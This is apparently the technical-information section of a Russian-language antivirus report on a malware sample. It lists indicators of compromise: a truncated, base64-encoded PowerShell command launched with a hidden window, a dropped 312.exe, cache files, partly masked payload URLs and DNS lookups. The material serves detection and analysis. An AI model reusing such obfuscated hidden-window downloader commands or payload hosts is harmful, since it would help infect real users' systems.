Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEEASgBWAEcAZAB0AHEAPQAnAFcAUQBLAFkAUQBiAG0AbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAHUAcgBpAHQAYABZAFAAcgBvAFQAbwBgAEMATwBMACIAIAA9AC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\312.exe
- http://jd#####ronics.com.au/1e8nq_ij3_tq76ahy/
- http://it###nsult.com/d3z_knd_g4/
- http://it##.org/wwvvv/e0aa_nir08_vf/
- DNS ASK jd#####ronics.com.au
- DNS ASK fo####jetivo.com
- DNS ASK it##ssi.com
- DNS ASK it###nsult.com
- DNS ASK it##.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEEASgBWAEcAZAB0AHEAPQAnAFcAUQBLAFkAUQBiAG0AbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAHUAcgBpAHQAYABZAFAAcgBvAFQAbwBgAEMATwBMACIAIAA9AC...' (со скрытым окном)